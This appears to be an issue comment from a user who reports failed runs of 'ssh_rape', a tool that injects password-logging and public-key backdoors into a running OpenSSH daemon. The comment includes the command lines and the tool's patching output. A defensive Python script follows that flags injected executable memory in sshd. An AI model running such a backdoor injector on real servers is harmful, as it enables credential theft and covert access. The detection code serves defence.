Thank you for your code, it's a great piece of work :+1:
I have been trying to run it on my debian station (OpenSSH_6.9p1 Debian-3, OpenSSL 1.0.2d 9 Jul 2015, binary here sshd.zip) :
$ sudo ./ssh_rape -P ~/.ssh/id_rsa.pub -t 127.0.0.1:31337 $(pidof sshd|awk '{print $1}')
_______ __________ ___. _____ _____________ ______
_/ ____/_/ ____| | | _\ __ )_ _\__ \ __ \/ __ )_
/\___ \/\___ \| ' | | / \/ _ / / / __/___/_
/ / / / / | \ | , / / . | ___/ \/ /
\ _______\ _______/____|____\ |___:\___\_____/__| | \__________\
\/ \/ \___|
[+] you gave me pid 8157
[+] slurping stuff to memory..
[+] found sshd ELF base @ 0x55fb79f76000
[+] loaded 117 memory mappings
[+] sshd binary path = '/usr/sbin/sshd'
[+] oh, we're dealing with an sshd that probably uses sshkey_* api..
[+] syscall = 0x55fb79f9cd75
[+] rexec_flag = 0x55fbbef87fed
[+] allocating config memory @ 0x55fb7a039000
[+] found sshd ELF base @ 0x55fb79f76000
[+] installing passlogger backdoor for [0x0100007f:0x697a] (TCP)..
[!] ERROR: could not locate use_privsep :(
$
[...]
$ sudo ./ssh_rape -P ~/.ssh/id_rsa.pub $(pidof sshd|awk '{print $1}')
_______ __________ ___. _____ _____________ ______
_/ ____/_/ ____| | | _\ __ )_ _\__ \ __ \/ __ )_
/\___ \/\___ \| ' | | / \/ _ / / / __/___/_
/ / / / / | \ | , / / . | ___/ \/ /
\ _______\ _______/____|____\ |___:\___\_____/__| | \__________\
\/ \/ \___|
[+] you gave me pid 7399
[+] slurping stuff to memory..
[+] found sshd ELF base @ 0x55ee7c843000
[+] loaded 117 memory mappings
[+] sshd binary path = '/usr/sbin/sshd'
[+] oh, we're dealing with an sshd that probably uses sshkey_* api..
[+] syscall = 0x55ee7c869d75
[+] rexec_flag = 0x55eec1854fed
[+] allocating config memory @ 0x55ee7c906000
[+] found sshd ELF base @ 0x55ee7c843000
[+] installing pubkey backdoor..
[+] lea = 0x55ee7c86812b
[+] key_allowed = 0x24d40 .. patched at offset 0x8 in import table!
[+] lea = 0x55ee7c8a07d5
[+] restore_uid = 0x5d7b0 .. patched at offset 0x10 in import table!
[+] DSA_new@got = 0x0
[+] BN_new@got = 0x0
[+] DSA_new@plt = 0x0
[+] BN_new@plt = 0x0
[+] yo we got a callpair for (DSA_new, BN_new) -> 0x0
[!] ERROR: key_new not found :(
Thanks for any help :)
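From a defender's side, the log above shows what such a tool leaves behind in a running sshd: import-table entries patched in place and a fresh memory region allocated inside the process. One cheap host check for the second artifact is to walk the daemon's memory map and flag executable regions that are not backed by a file, or that are both writable and executable. The script below is an added example, not code from this issue or from the ssh_rape project; the /proc/<pid>/maps samples and their addresses are constructed for illustration.

```python
"""Heuristic check of a process's memory map for injected code.

Parses text in /proc/<pid>/maps format and reports executable regions
that are not backed by a file on disk, or that are writable and
executable at the same time. A daemon like sshd has no JIT, so it should
normally have no such regions; an anonymous executable mapping in it is
worth a closer look.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# One line of /proc/<pid>/maps: range, perms, offset, dev, inode, optional path.
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+"
    r"(?P<perms>[rwxps-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+"
    r"(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+"
    r"(?P<inode>\d+)\s*"
    r"(?P<path>.*)$"
)

# Kernel-provided regions that are executable by design and have no file.
BENIGN_SPECIAL = {"[vdso]", "[vsyscall]"}

# Constructed sample (addresses are made up): an sshd image plus one
# anonymous rwx region of the kind an in-memory injector might allocate.
SAMPLE_MAPS = """\
55ee7c843000-55ee7c8f0000 r-xp 00000000 08:01 131239  /usr/sbin/sshd
55ee7c8f0000-55ee7c8f5000 r--p 000ad000 08:01 131239  /usr/sbin/sshd
55ee7c8f5000-55ee7c8f8000 rw-p 000b2000 08:01 131239  /usr/sbin/sshd
55ee7c906000-55ee7c907000 rwxp 00000000 00:00 0
7f3a1c000000-7f3a1c1c0000 r-xp 00000000 08:01 262210  /lib/x86_64-linux-gnu/libc.so.6
7ffd2a1e0000-7ffd2a201000 rw-p 00000000 00:00 0                [stack]
7ffd2a3f4000-7ffd2a3f6000 r-xp 00000000 00:00 0                [vdso]
"""

# Constructed clean sample: only file-backed and kernel-provided code.
CLEAN_MAPS = """\
55ee7c843000-55ee7c8f0000 r-xp 00000000 08:01 131239  /usr/sbin/sshd
55ee7c8f5000-55ee7c8f8000 rw-p 000b2000 08:01 131239  /usr/sbin/sshd
7ffd2a3f4000-7ffd2a3f6000 r-xp 00000000 00:00 0                [vdso]
"""


@dataclass
class Finding:
    start: int
    end: int
    perms: str
    path: str
    reason: str


def parse_maps(text: str) -> List[Dict]:
    """Turn maps text into a list of dicts; raises on a line it cannot parse."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = MAPS_LINE.match(line)
        if not m:
            raise ValueError(f"unparseable maps line: {line!r}")
        entries.append({
            "start": int(m["start"], 16),
            "end": int(m["end"], 16),
            "perms": m["perms"],
            "inode": int(m["inode"]),
            "path": m["path"].strip(),
        })
    return entries


def suspicious_mappings(text: str) -> List[Finding]:
    """Return executable regions that are anonymous or writable+executable."""
    findings = []
    for e in parse_maps(text):
        perms = e["perms"]
        if "x" not in perms or e["path"] in BENIGN_SPECIAL:
            continue
        anonymous = e["inode"] == 0 and not e["path"].startswith("/")
        if anonymous:
            findings.append(Finding(e["start"], e["end"], perms,
                                    e["path"] or "<anonymous>",
                                    "executable region not backed by a file"))
        elif "w" in perms:
            findings.append(Finding(e["start"], e["end"], perms, e["path"],
                                    "file-backed region mapped writable and executable"))
    return findings


def check_pid(pid: int) -> List[Finding]:
    """Run the check against a live process (reading its maps needs privilege)."""
    with open(f"/proc/{pid}/maps") as f:
        return suspicious_mappings(f.read())


if __name__ == "__main__":
    for f in suspicious_mappings(SAMPLE_MAPS):
        print(f"{f.start:#x}-{f.end:#x} {f.perms} {f.path}: {f.reason}")
```

Run it against every sshd pid (for example `for p in $(pidof sshd); do python3 check.py $p; done` once `__main__` is wired to `check_pid`) as part of a periodic host check. It is a heuristic, not a verdict: runtimes with a JIT legitimately create anonymous executable memory, and an injector that only rewrites the GOT without mapping new code leaves no trace here, so pair it with comparing the live import table against the on-disk binary.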